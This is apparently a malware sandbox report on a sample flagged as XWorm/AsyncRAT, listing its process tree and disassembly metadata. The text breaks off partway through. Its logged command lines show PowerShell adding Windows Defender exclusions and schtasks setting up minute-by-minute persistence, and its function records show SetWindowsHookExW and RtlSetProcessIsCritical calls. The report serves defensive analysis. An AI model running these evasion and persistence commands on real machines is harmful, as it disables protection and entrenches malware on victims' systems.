                                                    Start time:14:56:54
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\TJXpRilNkh.exe"
                                                    Imagebase:0x5f0000
                                                    File size:76'800 bytes
                                                    MD5 hash:F19B33379B749F757BB47C0866AF8808
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:14:56:56
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:14:56:56
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:14:57:04
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TJXpRilNkh.exe'
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:14:57:04
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:14:57:16
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:14:57:16
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:14:57:32
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                                                    Imagebase:0x7ff73f810000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:14:57:32
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:14:57:43
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                                                    Imagebase:0x200000
                                                    File size:76'800 bytes
                                                    MD5 hash:F19B33379B749F757BB47C0866AF8808
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 79%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:14:57:51
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                                                    Imagebase:0x9b0000
                                                    File size:76'800 bytes
                                                    MD5 hash:F19B33379B749F757BB47C0866AF8808
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:14:58:01
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Imagebase:0x440000
                                                    File size:76'800 bytes
                                                    MD5 hash:F19B33379B749F757BB47C0866AF8808
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:14:59:00
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    Imagebase:0x820000
                                                    File size:76'800 bytes
                                                    MD5 hash:F19B33379B749F757BB47C0866AF8808
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:14:59:22
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5236 -s 2964
                                                    Imagebase:0x7ff6147a0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:20.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:6
                                                      Total number of Limit Nodes:0
                                                      execution_graph 3604 7ff848e95048 3605 7ff848e95051 SetWindowsHookExW 3604->3605 3607 7ff848e95121 3605->3607 3608 7ff848e93248 3609 7ff848e93251 RtlSetProcessIsCritical 3608->3609 3611 7ff848e93432 3609->3611

                                                      Executed Functions

                                                      Function 00007FF848E934F9 Relevance: 3.9, Strings: 2, Instructions: 1411COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff848e934f9-7ff848e9358d call 7ff848e92af0 call 7ff848e90378 call 7ff848e92918 11 7ff848e935c1-7ff848e935e4 0->11 12 7ff848e9358f-7ff848e935bc call 7ff848e90388 0->12 16 7ff848e935ea-7ff848e935f7 11->16 17 7ff848e9469d-7ff848e946a4 11->17 12->11 18 7ff848e93958 16->18 19 7ff848e935fd-7ff848e9363b 16->19 20 7ff848e946ae-7ff848e946b5 17->20 23 7ff848e9395d-7ff848e93991 18->23 26 7ff848e93641-7ff848e9365e call 7ff848e92928 19->26 27 7ff848e94678-7ff848e9467e 19->27 21 7ff848e946c6 20->21 22 7ff848e946b7-7ff848e946c1 call 7ff848e90368 20->22 29 7ff848e946d2 21->29 22->21 28 7ff848e93998-7ff848e939da 23->28 26->27 35 7ff848e93664-7ff848e9369e 26->35 27->29 30 7ff848e94680-7ff848e94697 27->30 44 7ff848e939dc-7ff848e939fd 28->44 45 7ff848e939ff-7ff848e93a33 28->45 34 7ff848e946d7-7ff848e94712 29->34 30->16 30->17 41 7ff848e936a0-7ff848e936f3 35->41 42 7ff848e936fd-7ff848e93725 35->42 41->42 49 7ff848e94019-7ff848e94041 42->49 50 7ff848e9372b-7ff848e93738 42->50 48 7ff848e93a3a-7ff848e93a7c 44->48 45->48 68 7ff848e93aa1-7ff848e93ad5 48->68 69 7ff848e93a7e-7ff848e93a9f 48->69 49->27 59 7ff848e94047-7ff848e94054 49->59 50->18 53 7ff848e9373e-7ff848e93830 50->53 118 7ff848e93ff0-7ff848e93ff6 53->118 119 7ff848e93836-7ff848e93933 call 7ff848e90358 53->119 59->18 60 7ff848e9405a-7ff848e94150 59->60 101 7ff848e94156-7ff848e941b9 60->101 102 7ff848e947cc-7ff848e94807 60->102 73 7ff848e93adc-7ff848e93bf3 call 7ff848e90358 68->73 69->73 138 7ff848e93bf5-7ff848e93c16 73->138 139 7ff848e93c18-7ff848e93c4c 73->139 110 7ff848e9480c-7ff848e94847 101->110 125 7ff848e941bf-7ff848e94222 101->125 102->110 120 7ff848e9484c-7ff848e94880 110->120 118->29 123 7ff848e93ffc-7ff848e94013 118->123 119->23 169 7ff848e93935-7ff848e93956 119->169 126 7ff848e94887 120->126 123->49 123->50 125->120 146 7ff848e94228-7ff848e942fb 125->146 126->126 141 7ff848e93c53-7ff848e93cea 138->141 139->141 141->18 172 7ff848e93cf0-7ff848e93ea0 call 7ff848e90358 141->172 169->28 172->29 198 7ff848e93ea6-7ff848e93ea8 172->198 199 7ff848e94717-7ff848e94764 198->199 200 7ff848e93eae-7ff848e93eec 198->200 212 7ff848e94766-7ff848e94787 199->212 213 7ff848e9478c-7ff848e947c7 199->213 200->34 209 7ff848e93ef2-7ff848e93f7d 200->209 221 7ff848e93fcd-7ff848e93fea 209->221 222 7ff848e93f7f 209->222 212->213 213->102 221->118 223 7ff848e93f83-7ff848e93f9b 222->223 225 7ff848e93f9d-7ff848e93fc6 223->225 225->221
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: B$SAL_^
                                                      • API String ID: 0-405448676
                                                      • Opcode ID: 7f36a3be540153db3c6f3d51b254e4f596cb0859ffa452a9edd20d671fa57ae4
                                                      • Instruction ID: 009e09c473d5e2c6f9534806b9cd6bc27f8202ccc7ec8099160d7c3f2802c040
                                                      • Opcode Fuzzy Hash: 7f36a3be540153db3c6f3d51b254e4f596cb0859ffa452a9edd20d671fa57ae4
                                                      • Instruction Fuzzy Hash: 22A27070A18A099FEB88EF68C49977DB7E2FF98744F144579D40DD3291DF38A8818B41
                                                      Function 00007FF848E9451D Relevance: 2.9, Strings: 2, Instructions: 415COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 252 7ff848e9451d-7ff848e94520 253 7ff848e94522-7ff848e94546 252->253 254 7ff848e9456d-7ff848e94589 252->254 266 7ff848e948cc-7ff848e94907 253->266 267 7ff848e9454c-7ff848e94566 253->267 257 7ff848e945d7-7ff848e945da 254->257 258 7ff848e9458c-7ff848e945d0 254->258 259 7ff848e9462a-7ff848e94659 257->259 260 7ff848e945dc-7ff848e94623 257->260 258->257 263 7ff848e946d2 259->263 264 7ff848e9465b-7ff848e94672 259->264 260->259 271 7ff848e946d7-7ff848e94712 263->271 268 7ff848e94047-7ff848e94054 264->268 269 7ff848e94678-7ff848e9467e 264->269 266->254 267->254 272 7ff848e93958 268->272 273 7ff848e9405a-7ff848e94150 268->273 269->263 274 7ff848e94680-7ff848e94697 269->274 278 7ff848e9395d-7ff848e93991 272->278 333 7ff848e94156-7ff848e941b9 273->333 334 7ff848e947cc-7ff848e94807 273->334 276 7ff848e935ea-7ff848e935f7 274->276 277 7ff848e9469d-7ff848e946a4 274->277 276->272 282 7ff848e935fd-7ff848e9363b 276->282 284 7ff848e946ae-7ff848e946b5 277->284 287 7ff848e93998-7ff848e939da 278->287 282->269 292 7ff848e93641-7ff848e9365e call 7ff848e92928 282->292 285 7ff848e946c6 284->285 286 7ff848e946b7-7ff848e946c1 call 7ff848e90368 284->286 285->263 286->285 304 7ff848e939dc-7ff848e939fd 287->304 305 7ff848e939ff-7ff848e93a33 287->305 292->269 297 7ff848e93664-7ff848e9369e 292->297 307 7ff848e936a0-7ff848e936f3 297->307 308 7ff848e936fd-7ff848e93725 297->308 309 7ff848e93a3a-7ff848e93a7c 304->309 305->309 307->308 315 7ff848e94019-7ff848e94041 308->315 316 7ff848e9372b-7ff848e93738 308->316 331 7ff848e93aa1-7ff848e93ad5 309->331 332 7ff848e93a7e-7ff848e93a9f 309->332 315->268 315->269 316->272 318 7ff848e9373e-7ff848e93830 316->318 387 7ff848e93ff0-7ff848e93ff6 318->387 388 7ff848e93836-7ff848e93933 call 7ff848e90358 318->388 338 7ff848e93adc-7ff848e93bf3 call 7ff848e90358 331->338 332->338 343 7ff848e9480c-7ff848e94847 333->343 356 7ff848e941bf-7ff848e94222 333->356 334->343 400 7ff848e93bf5-7ff848e93c16 338->400 401 7ff848e93c18-7ff848e93c4c 338->401 352 7ff848e9484c-7ff848e94880 343->352 357 7ff848e94887 352->357 356->352 374 7ff848e94228-7ff848e942fb 356->374 357->357 387->263 390 7ff848e93ffc-7ff848e94013 387->390 388->278 428 7ff848e93935-7ff848e93956 388->428 390->315 390->316 405 7ff848e93c53-7ff848e93cea 400->405 401->405 405->272 427 7ff848e93cf0-7ff848e93ea0 call 7ff848e90358 405->427 427->263 452 7ff848e93ea6-7ff848e93ea8 427->452 428->287 453 7ff848e94717-7ff848e94764 452->453 454 7ff848e93eae-7ff848e93eec 452->454 466 7ff848e94766-7ff848e94787 453->466 467 7ff848e9478c-7ff848e947c7 453->467 454->271 463 7ff848e93ef2-7ff848e93f7d 454->463 475 7ff848e93fcd-7ff848e93fea 463->475 476 7ff848e93f7f 463->476 466->467 467->334 475->387 477 7ff848e93f83-7ff848e93f9b 476->477 479 7ff848e93f9d-7ff848e93fc6 477->479 479->475
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: B$SAL_^
                                                      • API String ID: 0-405448676
                                                      • Opcode ID: 33e714bf7094d64e8b079ec7f87c901a14a202dc623399b3faecfd301db044a7
                                                      • Instruction ID: 042e6eb8d3537d0264bfff793e581b7504c3885f0c82dd81ba5103b678c3f0e9
                                                      • Opcode Fuzzy Hash: 33e714bf7094d64e8b079ec7f87c901a14a202dc623399b3faecfd301db044a7
                                                      • Instruction Fuzzy Hash: 3BE1A170E1CA499FEB58EB68C495779BBE2FF88348F144579D00DD3281DF78A8818B46
                                                      Function 00007FF848E91699 Relevance: 2.1, Strings: 1, Instructions: 898COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 703 7ff848e91699-7ff848e916d0 705 7ff848e916d6-7ff848e917ae call 7ff848e90558 * 5 call 7ff848e90670 703->705 706 7ff848e9201b-7ff848e92062 703->706 736 7ff848e917b0 705->736 737 7ff848e917b7-7ff848e917fb call 7ff848e90490 705->737 736->737 743 7ff848e91823-7ff848e91843 737->743 744 7ff848e917fd-7ff848e9181c call 7ff848e90358 737->744 750 7ff848e91854-7ff848e918b8 call 7ff848e90e20 743->750 751 7ff848e91845-7ff848e9184f call 7ff848e90368 743->751 744->743 761 7ff848e91958-7ff848e919e6 750->761 762 7ff848e918be-7ff848e91953 750->762 751->750 782 7ff848e919ed-7ff848e91a68 call 7ff848e91160 call 7ff848e91128 761->782 762->782 792 7ff848e91a69-7ff848e91aa5 call 7ff848e90378 call 7ff848e90388 782->792 799 7ff848e91aa7-7ff848e91ab2 792->799 800 7ff848e91acc-7ff848e91aec 792->800 799->792 803 7ff848e91ab4-7ff848e91ac5 call 7ff848e90358 799->803 807 7ff848e91afd-7ff848e91b5c 800->807 808 7ff848e91aee-7ff848e91af8 call 7ff848e90368 800->808 803->800 815 7ff848e91b84-7ff848e91ba4 807->815 816 7ff848e91b5e-7ff848e91b69 807->816 808->807 820 7ff848e91bb5-7ff848e91c97 815->820 821 7ff848e91ba6-7ff848e91bb0 call 7ff848e90368 815->821 816->815 835 7ff848e91ce5-7ff848e91d18 820->835 836 7ff848e91c99-7ff848e91ccc 820->836 821->820 846 7ff848e91d1a-7ff848e91d3b 835->846 847 7ff848e91d3d-7ff848e91d6d 835->847 836->835 843 7ff848e91cce-7ff848e91cdb 836->843 843->835 848 7ff848e91cdd-7ff848e91ce3 843->848 849 7ff848e91d75-7ff848e91dac 846->849 847->849 848->835 856 7ff848e91dd1-7ff848e91e01 849->856 857 7ff848e91dae-7ff848e91dcf 849->857 858 7ff848e91e09-7ff848e91e75 call 7ff848e90398 856->858 857->858 865 7ff848e91e7c-7ff848e91ec6 call 7ff848e91020 call 7ff848e90608 858->865 875 7ff848e91ec8-7ff848e91ef0 call 7ff848e90e20 865->875 876 7ff848e91e69-7ff848e91e75 call 7ff848e90398 865->876 884 7ff848e91ef2 call 7ff848e910a8 875->884 885 7ff848e91ef7-7ff848e91ffb 875->885 876->865 884->885 904 7ff848e92002-7ff848e9201a 885->904
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: SAL_^
                                                      • API String ID: 0-3687847113
                                                      • Opcode ID: 028e2ffd655643a96a690b80c0239d6946d52680f7f58b23eb05a02097d2ffc5
                                                      • Instruction ID: 1561aee65e32238b39ff1ceff8f5cdcfa541e09d50ff2006523cc0075aecdc98
                                                      • Opcode Fuzzy Hash: 028e2ffd655643a96a690b80c0239d6946d52680f7f58b23eb05a02097d2ffc5
                                                      • Instruction Fuzzy Hash: B652DE61E1CE495FE798FB6884592B9B7D2FF88780F440579D00EC32C6DF2CA8418756
                                                      Function 00007FF848E921C9 Relevance: .2, Instructions: 211COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1230 7ff848e921c9-7ff848e921d5 1231 7ff848e921d7 1230->1231 1232 7ff848e921d8-7ff848e921e9 1230->1232 1231->1232 1233 7ff848e921eb 1232->1233 1234 7ff848e921ec-7ff848e921fd 1232->1234 1233->1234 1235 7ff848e92200-7ff848e92211 1234->1235 1236 7ff848e921ff 1234->1236 1237 7ff848e92213 1235->1237 1238 7ff848e92214-7ff848e92225 1235->1238 1236->1235 1237->1238 1239 7ff848e92227 1238->1239 1240 7ff848e92228-7ff848e92239 1238->1240 1239->1240 1241 7ff848e9223b 1240->1241 1242 7ff848e9223c-7ff848e9224d 1240->1242 1241->1242 1243 7ff848e92250-7ff848e92261 1242->1243 1244 7ff848e9224f 1242->1244 1245 7ff848e92263 1243->1245 1246 7ff848e92264-7ff848e92340 1243->1246 1244->1243 1245->1246 1260 7ff848e9234a-7ff848e9234b 1246->1260 1261 7ff848e92352-7ff848e9236e 1260->1261 1263 7ff848e92370-7ff848e92373 1261->1263 1264 7ff848e9237c-7ff848e9239f 1263->1264
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71ecc636db46cb0b2873667c3750f656e8c297bfc5d60bcc68242f4c895c5207
                                                      • Instruction ID: f90c31a9e71ec65bedac31bd54dacad4aea42a592ead57685f3d1124e33abc0f
                                                      • Opcode Fuzzy Hash: 71ecc636db46cb0b2873667c3750f656e8c297bfc5d60bcc68242f4c895c5207
                                                      • Instruction Fuzzy Hash: 6B512220A1E6C95FDB86AB781824276BFE4EF57259F0800FBE0DDC71A3DE585806C356
                                                      Function 00007FF848E93248 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 226 7ff848e93248-7ff848e9327a 229 7ff848e932a7-7ff848e932f6 226->229 230 7ff848e9327c-7ff848e932a2 226->230 235 7ff848e93352-7ff848e93430 RtlSetProcessIsCritical 229->235 236 7ff848e932f8-7ff848e93351 229->236 230->229 248 7ff848e93432 235->248 249 7ff848e93438-7ff848e9346d 235->249 236->235 248->249
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID: CriticalProcess
                                                      • String ID: cZ
                                                      • API String ID: 2695349919-501663447
                                                      • Opcode ID: 3b86d1175e7d4f41b7ef4ad0e84d4a0b3fe49ecae762296f5cd9d3b8bbebdcf4
                                                      • Instruction ID: a67c2a0fbfe16789a896e6afe3a08890aa82118f19e1a189719b9e0f9366775e
                                                      • Opcode Fuzzy Hash: 3b86d1175e7d4f41b7ef4ad0e84d4a0b3fe49ecae762296f5cd9d3b8bbebdcf4
                                                      • Instruction Fuzzy Hash: CF716732D0DA848FE319DBACA85A1B97FE0FF66754F1800BFD08D87193DE2568068795
                                                      Function 00007FF848E95048 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 998 7ff848e95048-7ff848e9504f 999 7ff848e95051-7ff848e95059 998->999 1000 7ff848e9505a 998->1000 999->1000 1001 7ff848e9505c-7ff848e95069 1000->1001 1001->1001 1002 7ff848e9506b-7ff848e950cd 1001->1002 1006 7ff848e950d3-7ff848e950e0 1002->1006 1007 7ff848e95159-7ff848e9515d 1002->1007 1008 7ff848e950e2-7ff848e9511f SetWindowsHookExW 1006->1008 1007->1008 1010 7ff848e95121 1008->1010 1011 7ff848e95127-7ff848e95158 1008->1011 1010->1011
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3567284566.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e90000_TJXpRilNkh.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: 053a1f1c1cddb918f97a1f812201821383db30f951ce7afdc189ea630f570cb1
                                                      • Instruction ID: 7f585a993f40eaa8037d1ffd66575c5d604c602f0a2df21951ce9c9024594010
                                                      • Opcode Fuzzy Hash: 053a1f1c1cddb918f97a1f812201821383db30f951ce7afdc189ea630f570cb1
                                                      • Instruction Fuzzy Hash: BA41033190CA4D8FDB18EB6898066F9BBE1FB59321F00027ED00DC3292CB74A8028BC5

                                                      Executed Functions

                                                      Function 00007FF848F3660A Relevance: .4, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ce8f5fb442d15516e68ed94efae58025aa09f7b6f1230dcf76202d1e9528122
                                                      • Instruction ID: 1c1b0e1607caec54d29c98842644ac7c64504a7fba74dc9075af82bb9a3257a7
                                                      • Opcode Fuzzy Hash: 9ce8f5fb442d15516e68ed94efae58025aa09f7b6f1230dcf76202d1e9528122
                                                      • Instruction Fuzzy Hash: 58C14371E0EA8A5FE799EB2858155B5BBE0FF16394F1801BBD40DCB0D3EE1CA8058355
                                                      Function 00007FF848F3662D Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a58eeb8fffe0ee37fa9929f0fc0b7225bb4320364e835bd9fb962b83040d639
                                                      • Instruction ID: 4e8707bfc0c893b624c051a8d09cd8fc3917dcf6c5069143bdf2a3f6d9622f72
                                                      • Opcode Fuzzy Hash: 9a58eeb8fffe0ee37fa9929f0fc0b7225bb4320364e835bd9fb962b83040d639
                                                      • Instruction Fuzzy Hash: 1981F071D0EBC64FE7A6AB2854645747BE0EF16694F6800FBC049CB1D3EE1CAC059359
                                                      Function 00007FF848F34073 Relevance: .2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6782f49dac651a99e3e0d8656f7530ddafefd10c8e26eea43346273945721012
                                                      • Instruction ID: f40bc0158290d000e714ec2aff9b1f40ac81da50c47197ec4590005149a3fff6
                                                      • Opcode Fuzzy Hash: 6782f49dac651a99e3e0d8656f7530ddafefd10c8e26eea43346273945721012
                                                      • Instruction Fuzzy Hash: 1F51CE32A1DE864FE79AAB6C54116B477E2EFB5260F5801BBC00EC72D7DF14E8058299
                                                      Function 00007FF848F34370 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
